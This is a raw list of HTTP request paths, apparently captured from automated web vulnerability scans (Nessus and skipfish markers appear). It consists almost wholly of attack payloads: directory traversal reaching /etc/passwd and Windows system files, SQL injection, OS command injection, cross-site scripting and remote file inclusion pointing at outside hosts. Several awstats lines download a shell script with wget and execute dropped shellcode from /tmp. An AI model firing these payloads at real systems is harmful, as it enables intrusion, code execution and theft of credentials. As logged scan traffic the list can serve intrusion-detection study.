/mv8wxfy9.x?
/javascript/.htpasswd.sfish/0000023456
/manager/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w
/javascript/~mark.exe
/fpnpp5zg.mscgi?
/gvx7m5ti.fts?
/webcgi/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go
/scripts/lpzj75ztw9lb.html
/scripts/app_and_readme/navigator/index.php?page=http://192.168.202.96:8080/frznctvhi0i5?
/help.php?q=uname >q93421292 #
/5qnlm5z2.php?
/6n7aacgg.kspx?
/nmw0do67.cfm?
/bxnyrhmh.htm?
/j4drbkil.mscgi?
/help.php?q="|ping\x0b-w\x0b8000\x0b-n\x0b1\x0b4.3.2.1|rem\x0b
/scripts/weigh_keywords.php?etcdir=http://192.168.202.118:8080/tzhfyzkbomspvm?
/606wkcop.php3?
/examples/servlets/servlet/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\x00
/bemarket/postscript/postscript.php?p_mode=http://192.168.202.118:8080/zz5thkvtmlgl?
/webdav/phprun.php?cmd=c:\wce.exe
/javascript/document.do
/cacti/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00
/scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 289896836--
/5qnlm5z2.aspx?
/en-us/dda2qr7j.html?
/scripts/tomcat_proxy_directory_traversal.nasl1331904240
/s7qus4g3.jsp?
/examples/jsp/colors/man-cgi?section=0&topic=ls;id
/apavxugx.do?
/scripts/awstatstotals.php?sort="].phpinfo().exit().$a["
/bn857frh.php?
/eg2u8pbv.cgi?
/scripts?username="document.cookie="testzgnm=1183;"
/help.php?q="&uname >q86369979 #
/script_path/config.inc.php?_path=http://192.168.202.96:8080/whmch8ftkt7kv??
/main.php?stuff="ver\x0b>q67582951&rem\x0b
/sitescope/cgi/go.exe/sitescope?account=administrator&logname=system&machine=&page=eventlog
/www/delivery/ac.php?bannerid=-1331918977+or+1=1+--+';passthru(base64_decode($_server[http_nessus_bjmml9oq]));die;/*
/en-us/account/demos/demo.browse.php?filename=/etc/passwd
/jdx255ea.mscgi?
/javascript/openjpa.exe
/subscript/
/phpmyadmin/zpanel.php?page=/etc/passwd\x00
/en-us/account/source?v=../../../../../../../../../../etc/passwd\x00
/main.php?logout="del\x0bq77294234&rem\x0b
/scripts/gallery.scr.php?globals[pth][func]=http://192.168.202.96:8080/4dckqcc0acprbz??
/usr/extensions/get_infochannel.inc.php?root_path=http://192.168.202.118:8080/ghl9il??cmd=id;pwd
/examples/jsp/sessions/carbo.dll?icatcommand=..\..\..\..\..\..\winnt\win.ini&catalogname=catalog
/examples/jsp/checkbox/index.php?sensor_program=
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+rcx>>ctdn
/javascript/.passwd.png
/awstats/awstats.pl?migrate=|echo;chmod 777 /tmp/cbpxmnuvtn.sh;echo|awstats233118.txt
/help.php?q="ping -w 10000 -n 1 1.2.3.4&rem
//..\..\..\..\..\..\..\..\etc/passwd
/qb2xy9aw.html?
/help.php?q='\x0duname\x09#
/examples/jsp/jsp2/el/fxm.exe
/scripts/index.php?search=&function=search
/profile.php?author_id='414156083542
/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332009306,0x3a,1514709258),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
/examples/jsp/checkbox/index.php?user_langue=../../../../../../../../../../etc/passwd
/82q7ywa8.exe?
/javascript/passwords.exe
/recordings/check_user_id.php?user_id=
/help.php?q="ping\x09-w\x099000\x09-n\x091\x091.2.3.4&rem\x09
/admin/index.php?msg=1&username="><"
/
/main.php?logout="&ver,>q91889862&rem,
/dda2qr7j.cfm?
/help.php?q="|ping\x0c-w\x0c8000\x0c-n\x0c1\x0c1.2.3.4|rem\x0c
/main.php?stuff=";del\x09q74362376\x09#
/main.php?stuff='\x0duname\x09#
/main.php?logout="\x0asleep\x097\x09#
/description/
/5o9zq43e.x?
/scripts/sdbsearch.cgi?stichwort=anything
/lib/dbman_filter.inc.php?lib_path=/etc/passwd\x00
/ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.96:8080/no4ghqiguzhst?'
/1qwv2p5p.aspx?
/weq93ppb.htm?
/j734qobz.cfc?
/ghswfouu.exe?
/examples/jsp/num/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--
/scripts/ggvfa_wichxq.php
/qhvu0pdg.kspx?
/conscript/
/main.php?logout=&uname\x09>q12279742\x09#
/top.php?stuff="&rm;q13316957&rem;
/fa8p8lr8.php?
/top.php?stuff='&sleep 10 #
/admin/htmlarea/popups/file/files.php?q=&mode=apparel
/examples/jsp/jsp2/jspx/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w
/scripts/tinfo.php?id=1331918989
/main.php?logout='rm\x09q24187781\x09#
/scripts/c0kha6w3apd3.php3
/vwmg565s.htm?
/manager/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\x00
/.cgi
/
/u95h6ymu.asp?
/script//ident/index.php?path_inc=http://192.168.202.118:8080/zz5thkvtmlgl?
/cgi-perl/pfdispaly.cgi?'\x0a/bin/cat /etc/passwd|'
/manager/core/editor.php?editor_insert_bottom=/etc/passwd
/virus-bursters.exe/
/javascript/framework.exe
/script/menu/menuadministration.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm?
/j4drbkil.mscgi?
/igtf0zon.html?
/recordings/ovlaunch.exe
/top.php?stuff="&ver;>q13316957&rem;
/ht8pn8uq.exe?
/examples/jsp/num/calendar.php?serverpath=/etc/passwd\x00
/iisadmpwd/..\xc1%8s..\xc1%8s..\xc1%8s..\xc1%8s..\xc1%8s../winnt/system32/cmd.exe?/c+dir+c:\+/og
/help.php?q=ver\x0b>q84117889&rem\x0b
/cytherea's lipstick lesbians/
/82q7ywa8.idc?
/hrttz9fj.jsp?
/o35zot2r.htm?
/top.php?stuff="rm\x0cq31638645&rem\x0c
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;/tmp/btnvlgnsgo;"
/top.php?stuff="del\x0cq81327195&rem\x0c
/scripts/gdxlwjnlsr6i.inc
/bxnyrhmh.dll?
/top.php?stuff=&ver\x0c>q57775181&rem\x0c
/examples/jsp/jsp2/el/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00
/odipkt_description/
/examples/jsp/sessions/kb.cgi?view='&lang=en
/transcript_list/
/cgi-bin/htsearch?exclude=`/etc/passwd`
/archive.php?scriptpath=http://cirt.net/rfiinc.txt??
/examples/jsp/jsp2/jspx/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00
/error.php?selected_theme=
/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904220&lang_crm=../../vtigerservice.php\x00
/transcript_gates/
/forum-ra_professionnel.asp?n=`/etc/passwd`
/examples/jsp/sessions/profil.php?id=1
/news/include/createdb.php?langfile;=http://192.168.202.118:8080/tzhfyzkbomspvm??
/m5103snj.jsp?
/examples/jsp/jsp2/el/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd
/main.php?stuff="ping\x0c-w\x0c10000\x0c-n\x0c1\x0c4.3.2.1|rem\x0c
/blake's notebook/
/vwmg565s.php?
/en-us/account/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/javascript/trackers.exe
/examples/jsp/sessions/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/zqqemp6j.mscgi?
/cacti/config.php?path[docroot]=/etc/passwd\x00
/top.php?stuff=";uname #
/pxagj7n7.fts?
/awstats/awstats.pl?migrate=|echo;wget -p /tmp/ http://192.168.202.102:80/awsegghnxp7katggbebfod2cnizwaa/lcqujjmwty.sh;echo|awstats726723.txt
/cgi-bin/starnet/addons/slideshow_full.php?album_name='123258797
/config.php?returnpath=/etc/passwd\x00
/en-us/
/examples/jsp/num/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h
/javascript/example.exe
/javascript/playlist.exe
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php%3fstuff%3d1861731255&frm_user=&scr_height=q25861218&scr_width=
/um7xpn15.kspx?
/bl8sefdm.pl?
/javascript/index_2.exe
/examples/jsp/cal/sawmillcl.exe?ho+{complete_version}
/33y9gcqq.htm?
/help.php?q="&rm\x0bq72412482&rem\x0b
/top.php?stuff=ver\x0c>q95318168&rem\x0c
/j4rdyhw8.nsf?
/recordings/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=;
/demo/ms-pe02/catalog.php?cid=0&sid='"&sortfield=title&sortorder=asc&pagenumber=1&main=http://192.168.202.118:8080/ghl9il?&
/nsn/..\util/copy.bas
/eg2u8pbv.pl?
/cgi-bin/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/1qwv2p5p.nsf?
/javascript/kids.exe
/main.php?stuff="\x0ddel\x09q16681283\x09#
/3hlysl2x.nsf?
/help.php?q=';sleep\x0910\x09#
/scripts/viewcvs.cgi/
/bzuf9ozq.mscgi?
/6n7aacgg.htm?
/top.php?stuff=ping;-w;9000;-n;1;4.3.2.1&rem;
/a0imiuf1.asp?
/counterscript/
/help.php?q="rm;q24461998&rem;
/javascript/document.asmx
/login.asp?sessionid=[">>
/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd
/eei78ore.cfm?
/top.php?stuff="ping\x09-w\x0910000\x09-n\x091\x094.3.2.1|rem\x09
/miz4r5hz.dll?
/nuh3zirz.pl?
/help.php?q='\x0adel q61886362 #
/tuwjta1w.exe?
/help.php?q="&uname >q34212187 #
/submitmanuscript/
/v3axg1p8.nsf?
/help.php?q="&rm\x0bq26193259&rem\x0b
/examples/servlets/servlet/wa.exe?debug-show-version
/examples/jsp/jsp2/jspx/awstatstotals.php?sort="].phpinfo().exit().$a["
/javascript/service.exe
/
/examples/jsp/error/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd
/examples/jsp/sessions/search.jsp?q=%"
/..\xc0\xaf/host-manager/html
/h5i6crm3.cfc?
/top.php?stuff="|sleep 9 #
/scripts/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+28+30+00+00+00+00++>>ctdn
/scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1284503405--
/scripts/cpshost.dll
/scripts/sitemap.scr.php?globals[pth][classes]=http://cirt.net/rfiinc.txt?
/zroo33l4.cgi?
/file_passwd/
/servlet/webacc?user.html=../../../../../../../../../../../../../../../../../../etc/passwd\x00
/javascript/document.c
/scripts/wsasp.dll/wservice=wsbroker1/webutil/ping.p
/scripts/bpk_bsfe_4vq.php
/help.php?q="ping\xa0-w\xa07000\xa0-n\xa01\xa01.2.3.4&rem\xa0
/phpmyadmin/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd
/help.php?q="ping\x09-w\x099000\x09-n\x091\x091.2.3.4|rem\x09
/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331908691&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/script_path/installation/index.php?mosconfig_absolute_path=http://192.168.202.118:8080/zz5thkvtmlgl??
/vwmg565s.kspx?
/cgi-bin/search.cgi?..\..\..\..\..\..\windows\win.ini
/javascript/tutorials.exe
/nuh3zirz.php?
/examples/jsp/cal/language.php?data_dir=/etc/passwd\x00
/b5xdqgz2.dll?
/examples/jsp/num/store.php?crn=42'&action=show&show_products_mode=cat_click
/en-us/account/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331905034&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/cacti/sendcard.php?view=1&id='sendcard_sql.nasl
/examples/jsp/checkbox/js/scripts.php?load=/etc/passwd\x00
/cgiscripts/
/examples/jsp/checkbox/index.php?gadget=glossary&action=viewterm&term=
/starnet/addons/slideshow_full.php?album_name='936668697
/index.php?show=/etc/passwd
/scripts/bveygnpo6hkw.shtml
/u95h6ymu.php?
/javascript/.passwd.csv
/javascript/layout.exe
/examples/jsp/error/remindpasswd
/scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1332010400,256728797 --
/javascript/document.ini
/main.php?logout="ping\x0c-w\x0c9000\x0c-n\x0c1\x0c4.3.2.1&rem\x0c
/l4fz1dqw.asp?
/phpmyadmin//%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
/scripts/?.jsp
/rpxyx07v.do?
/opinion.exe
/javascript/node.exe
/l4fz1dqw.do?
/examples/jsp/jsp2/jspx/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\x00
/setcookie.php?u=../../../../../../../../../../etc/passwd\x00
/recordings/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331918976&lang_crm=../../vtigerservice.php\x00
/ewc3rz1l.html?
/scripts/admin/index.php?act=login&username=' union select 1,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--&password=nessus
/javascript/weblogic.exe
/ybz5rz7a.nsf?
/examples/jsp/num/base_local_rules.php?dir=
/top.php?stuff="del;q52915956&rem;
/comments.php?scriptpath=http://192.168.202.118:8080/2aibfaczmac8??
/scripts/callboth.php?seq=654321&out=123456&in=1332009306@nessus\x0d\x0aasteridex_in_code_injection.nasl
/examples/jsp/error/mlog.html?screen=/etc/passwd
/en-us/h5sc3gxy.do?
/oie504mr.html?
/member/usercp_menu.php?script_folder=http://192.168.202.118:8080/zz5thkvtmlgl?
/top.php?stuff="|ping,-w,9000,-n,1,4.3.2.1|rem,
/openview5.exe?target=main&action=../../../../../../../../../..//winnt/win.ini
/en-us/oie504mr.html?
/help.php?q="&ping\x0c-w\x0c7000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c
/rpc/..\xc0%9v..\xc0%9v..\xc0%9v..\xc0%9v..\xc0%9v../winnt/system32/cmd.exe?/c+dir+c:\+/og
/m2fpztty.exe?
/?
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+ver+>>ctdn
/awstats/awstats.pl?migrate=|echo;/bin/echo -en "zj\0003x\0315\0200xp1\0322\0262\0377\0266\0377\0001\0320" >> /tmp/gjehhrjnrx0;echo|awstats214256.txt
/en-us/s7qus4g3.asp?
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php&frm_user=q83452335&scr_height=&scr_width=
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+debug
/awstats/awstats.pl?migrate=|echo;/./tmp/gjehhrjnrx0 > /dev/null &;echo|awstats741931.txt
/bn857frh.x?
/cgis/ppdscgi.exe
/main.php?stuff="&ver,>q13326619&rem,
/abuso dell'hardware nell'attacco al kernel di linux/
/javascript/stock.exe
/cgi-sys/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe
/examples/jsp/checkbox/index.php?mod_id=2&kb_ask=
/help_subscription/
/scripts/search.php?getdate=./templates/default/admin.tpl
/ht8pn8uq.cfc?
/cgi-local/pfdispaly.cgi?../../../../../../../../../../etc/passwd
/boilerplate.asp?nfuse_currentfolder=/&nfuse_template=.../.../.../.../.../.../.../.../.../boot.ini
/ht8pn8uq.fts?
/en-us/dda2qr7j.mscgi?
/top.php?stuff=';del q56884429 #
/phpmyadmin/search/results.stm?indexname=>">&style=fancy&spage=60&query=folder name
/javascript/audits.exe
/n1afe1y6.do?
/jujgxwav.cgi?
/n1afe1y6.do?
/scripts/pssdseehtgdp.php
/javascript/performance.exe
/0z575z74.php3?
/en-us/account/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\x00
/help.php?q='&uname\x09>q78257168\x09#
/examples/jsp/jsp2/jspx/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd
/modules.php?name=classifieds&op=viewads&id_subcatg=75&id_catg=
/javascript/nsf.exe
/de3v2dd9.idc?
/main.inc.php?pathtoscript=http://192.168.202.118:8080/ghl9il?
/cgi-home/ion-p.exe?page=c:\winnt\repair\sam
/examples/jsp/cal/wordtrans.php?command=show_desc&advanced=1";id; true "
/help.php?q="&ver&rem\x0c
/javascript/.passwd.yml
/vhzmaia2.fts?
/cgi-bin/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\x00
/fa8p8lr8.html?
/main.php?logout="ver\x0b>q12574322&rem\x0b
/scripts/index.php?id=s1_eihg6e1'
/examples/jsp/jsp2/el/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\x00
/javascript/compat.exe
/examples/jsp/sessions/search.pl?form=../../../../../../etc/passwd\x00
/bxnyrhmh.aspx?
/cgi-perl/ion-p?page=../../../../../etc/passwd
/copatranscript_20061102/
/main.php?logout="ping;-w;11000;-n;1;4.3.2.1|rem;
/examples/servlets/servlet/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd
/main.php?logout="del;q97754931&rem;
/if69ddo1.aspx?
/cacti/webdist.cgi?distloc=;id
/top.php?stuff="del\xa0q69465625&rem\xa0
/examples/jsp/sessions/index.php?album=../../../../../../../../../../etc/passwd\x00
/b4vng02k.cfc?
/manager/newsdesk.cgi?t=../../../../../../etc/passwd
/m5103snj.cfm?
/examples/jsp/num/way-board/way-board.cgi?db=/etc/passwd\x00
/javascript/document.pem
/en-us/oie504mr.mscgi?
/htbin/fileseek.cgi?foot=;cat /etc/passwd&head=
/top.php?stuff="ping\x0c-w\x0c7000\x0c-n\x0c1\x0c1.2.3.4|rem\x0c
/uc3w3bdi.do?
/copying/
/rpxyx07v.jspa?
/index.php?id=egyb16sayu'
/main.php?logout="ping\xa0-w\xa010000\xa0-n\xa01\xa04.3.2.1&rem\xa0
/examples/jsp/cal/cal_week.php?op=week&catview=999'
/hjdzm96v.php3?
/javascript/.htpasswd.sfish/''''""""
/javascript/jhtml.exe
/miz4r5hz.idc?
/.cfc
/perl_scripts/
/help.php?q=";uname\x09>q32988845\x09#
/en-us/account/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd
/help.php?q="|ping\x0b-w\x0b9000\x0b-n\x0b1\x0b4.3.2.1|rem\x0b
/vimscriptlinks/
/javascript/binary.exe
/main.php?logout="&del,q76194966&rem,
/9o6g5vkn.exe?
/.html
/scripts/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd||
/everything's just wonderful/
/weq93ppb.nsf?
/main.php?logout="&ping -w 11000 -n 1 1.2.3.4&rem
/javascript/.passwd.temp
/cgi-bin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331919198
/examples/jsp/jsp2/jspx/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\x00
/scripts/piywzua5hwer.html
/byrg33fw.php3?
/\">
/cgi-bin/review.php?id=1&cat=&subcat=">
/t578vqea.aspx?
/en-us/.asp
/help.php?q=&ver >q48647675&rem
/en-us/dda2qr7j.jsp?
/examples/jsp/jsp2/jspx/index.php?id='union/**/select/**/0,0,616656011,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
/apavxugx.cfc?
/scripts/calendar.php?month=' union select 1,1,'1331909175','calendarix_month_sql_injection.nasl',1 #
/comments.php?scriptpath=http://192.168.202.96:8080/4dckqcc0acprbz??
/main.php?logout="\x0ddel\x09q59885581\x09#
/webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd
/examples/jsp/colors/admin/admin.php?sid=0'
/scripts/vhost.php?action=logout&time=1331908669
/i2n4v4rl.kspx?
/javascript/.history.exe
/g3w7y7u5.php3?
/0u75ldxq.idc?
/$sitebase/redcell/phonehome_script.exe
/phpmyadmin/1'
/javascript/.htaccess/-->">'>'"
/help.php?q="uname >q96673282 #
/javascript/tail.exe
/help.php?q="rm q98145633&rem
/examples/jsp/error/index.php?chemin=../../../../../../..//etc
/javascript/adv.exe
/manager/index.php?gadget=../../../../../../etc/passwd\x00&path=/etc
/scripts/dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http://xxxxxxxxxx/
/j734qobz.mscgi?
/javascript/webwork.exe
/3j8echh0.fts?
/examples/jsp/colors/install.php?newlang=../../cpg_error.log\x00
/scripts/boarddata/data/user.idx
/redirection_scripts/
/main.php?frm_daynight=day&frm_passwd=q15634621&frm_referer=http%3a//192.168.26.202/main.php&frm_user=&scr_height=&scr_width=
/u95h6ymu.jsp?
/eesubscription/
/search.jsp?q=%"
/nsn/..\web/fdir.bas
/pxagj7n7.cfm?
/manager/nessus">
/cgi-perl/pfdisplay.cgi?'\x0a/bin/cat /etc/passwd|'
/bin/vssetcookie.exe
/examples/servlets/servlet/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\x00
/ows-bin/gw5/gwweb.exe?help=bad-request
/help.php?q='\x0arm q19373947 #
/examples/jsp/sessions/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login
//\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xaeetc/passwd
/vmi8bb12.mscgi?
/0z575z74.mscgi?
/examples/servlets/servlet/port.php?proto=tcp'
/main.php?stuff="rm q73888727&rem
/examples/jsp/sessions/sql.php3?lib_inc=1&btndrop=no&goto=/etc/passwd
/scripts/index.php?id=b6q5w0grm_'
/cgi-bin/../../../../../../../winnt/system32/ping.exe 127.0.0.1
/examples/jsp/error/index.php?include_files[]=&include_files[query_string]=/etc/passwd
/cacti/index.php?id='union/**/select/**/0,0,1448356578,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
/main.php?logout='&del\x09q79227952\x09#
/cgi-bin/popup.php?include_path=/etc/passwd\x00
/mailman/options/yourlist?language=en&email=<script>alert('vulnerable')</script>
/main.php?stuff=ver;>q27761754&rem;
/cacti/c32web.exe/getimage?imagename=cart32.ini\x00.gif
/examples/jsp/source.jsp?../../../../system/autoexec.ncf
/g3w7y7u5.cfm?
/cgi-bin/supporter/tupdate.php?groupid=change&sg='
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+d0+8b+04+91+01+f0+89+45+f0+eb+06+43+3b+5d+f4+72+d4+89+ec+61+8b+44+24+d0+c2++>>esbq
/rpc/..\xc1\x1c..\xc1\x1c..\xc1\x1c..\xc1\x1c..\xc1\x1c../winnt/system32/cmd.exe?/c+dir+c:\+/og
/en-us/jnv890lt.exe?
/phpmyadmin/documentation.html?phpmyadmin=
/help.php?q="&ver\x0b>q16289629&rem\x0b
/help.php?q="\x0duname #
/g8nu2yy7.dll?
/jscripts/
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;rm+/tmp/btnvlgnsgo"
/help.php?q=&ver\xa0>q47388185&rem\xa0
/lsoix5h3.jspa?
/9o6g5vkn.php?
/javascript/agent.exe
/phpmyadmin/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\x00
/readmore.php?config["sipssys"]=http://192.168.202.118:8080/2aibfaczmac8?
/examples/jsp/cal/wa.exe?debug-show-version
/examples/jsp/checkbox/search.pl?form=../../../../../../etc/passwd\x00
/help.php?q=del;q46895114&rem;
/jujgxwav.idc?
/includes/phpdig/includes/config.php?relative_script_path=http://192.168.202.118:8080/tzhfyzkbomspvm?
/scripts_photomanager/
/vbscript/
/phpmyadmin/usrdetails.php?sgnuptype=csaleid
/manager/kb.cgi?view='&lang=en
/cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password\x00
/examples/jsp/sessions/commerce.cgi?page=../../../../../etc/passwd\x00index.html
/en-us/account/c32web.exe/getimage?imagename=cart32.ini\x00.gif
/examples/jsp/colors/smpwservicescgi.exe
/forum1_professionnel.asp?n=1771&nn=100&page=/../../../../../../../../../../etc/passwd
/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\x00
/examples/jsp/cal/way-board/way-board.cgi?db=/etc/passwd\x00
/cgi-bin/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\x00
/en-us/account/?mod=read&id=../../../../../../../../../../../../../etc/passwd\x00
/javascript/nethome.exe
/help.php?q="&ver\x0c>q73531956&rem\x0c
/help.php?q=;sleep 7 #
/script/menu/menuprincipal.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8?
/cgi-bin/technote/main.cgi?board=free_board&command=down_load&filename=/../../../../../../../../../../etc/passwd
/examples/jsp/error/index.php?search=&function=search
/scripts/9pen4xzgztjn.php3
/edzaia0i.nsf?
/javascript/h.exe
/examples/jsp/cal/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_83ihjgrj]));die;/*
/vhzmaia2.x?
/3hlysl2x.pl?
/ghswfouu.idc?
/cgi.cgi/fileseek2.cgi?foot=;cat /etc/passwd&head=
/examples/jsp/sessions/index.php?chemin=../../../../../../..//etc
/weq93ppb.mscgi?
/recordings/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\x00
/forum_professionnel.asp?n=/etc/passwd\x00|41|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_'/'.
/en-us/account/search.cgi?..\..\..\..\..\..\winnt\win.ini
/scripts/core/editor.php?editor_insert_bottom=/etc/passwd
/10-leavin' to l/
/j4rdyhw8.mscgi?
/3j8echh0.idc?
/scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331909420,1,1564569063--
/examples/jsp/sessions/styles.php?toroot=/etc/passwd\x00
/javascript/second.exe
/javascript/member.exe
/en-us/i686v90l.exe?
/scripts/wsisa.dll/wservice=wsbroker1/webtools/oscommand.w
/en-us/account/ion-p.exe?page=c:\\winnt\\win.ini
/tocpracticeareadescriptions/
/examples/jsp/jsp2/el/index.cfm?fuseaction=category.display&category_id='
/main.php?logout=ver;>q21667624&rem;
/javascript/screenshots.exe
/c-scripts/
/search.jsp?q=%"
/contactscript/
/help.php?q="rm\x0bq76374652&rem\x0b
/static//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/scriptpath/index.php?page=http://192.168.202.96:8080/frznctvhi0i5?
/scripts/index.php?act=sm_window&page=event&day=-1 union select 1,1331919215,154330261 --
/cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1332009308,4--&blog=1
/en-us/account/profil.php?id=1
/examples/jsp/security/protected/is_cgi_installed3_j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6116917755.old
/rv98iwjp.x?
/transcriptofte179248/
/scripts/index
/?
/main.php?stuff="&ping -w 7000 -n 1 1.2.3.4&rem
/xlj7h65o.html?
/webdist.cgi?distloc=;id
/zqqemp6j.dll?
/examples/jsp/sessions/wa.exe?debug-show-version
/jsp-examples/jsp2/el/functions.jsp?foo=
/awstats/awstats.pl?migrate=|echo;/bin/echo -en "\0367\0322\0041\03201\0311qqj\0042j\0007pq\0211\0343" >> /tmp/ysooqnjtxq0;echo|awstats291577.txt
/lsoix5h3.cfc?
/javascript/tar.gz.exe
/javascript/pda.exe
/nmw0do67.jsp?
/7u1pb2xi.php?
/scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 109024103--
/scriptpath/footers.php?tinybb_footers=http://192.168.202.118:8080/iroy1gvqrrqu?
/scripts/index.php?src=1&_common=1&time=1332009308&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00
/help.php?q=ver&rem;
/examples/jsp/cal/index.php?sensor_program=
/scripts/samples/search/filesize.idq
/top.php?stuff='\x0asleep 11 #
/phpmyadmin/login.php?course=">
/qb2xy9aw.php3?
/examples/jsp/colors/index.php?configfile=../../../../../../../../../etc/passwd
/opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.118:8080/moclyxlwqyfjnp?\x00
/javascript/var.exe
/examples/jsp/num/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\x00
/cgi-bin/index.php?cid='
/scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.118:8080/moclyxlwqyfjnp?
/script_path/config.inc.php?_path=http://192.168.202.96:8080/vir0v3xfc??
/main.php?logout="uname\x09>q74671245\x09#
/hipkz026.cgi?
/cgi-win/ppdscgi.exe
/cacti/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\x00html
/javascript/beehive.exe
/qhvu0pdg.cgi?
/o35zot2r.html?
/x7pclv4s.html?
/examples/jsp/num/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd
/examples/jsp/num/index.php?selskin=../inc/boxleft.inc\x00&xposbox[l][]=/etc/passwd\x00
/phpmyadmin/index.php?id='union/**/select/**/0,0,1358744507,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
/examples/jsp/num/view_user.php?list=1&letter=&sort_by='select
/cgi-local/query?mss=../config
/javascript/access-log.exe
/phpmyadmin/error.php?selected_theme=
/de3v2dd9.mscgi?
/subscriptions.rss
/
/bin/pfdisplay.cgi?'\x0a/bin/cat /etc/passwd|'
/main.php?stuff="&rm q54323675&rem
/py-smbpasswd/
/?
/examples/jsp/colors/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\x00|
/javascript/arch.exe
/ydexw8by.html?
/cacti/topic.php?tid='select
/examples/jsp/error/index.php?show=../../../../../../../../../../../etc/passwd\x00
/w4996nr0.asp?
/cgis/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\x00
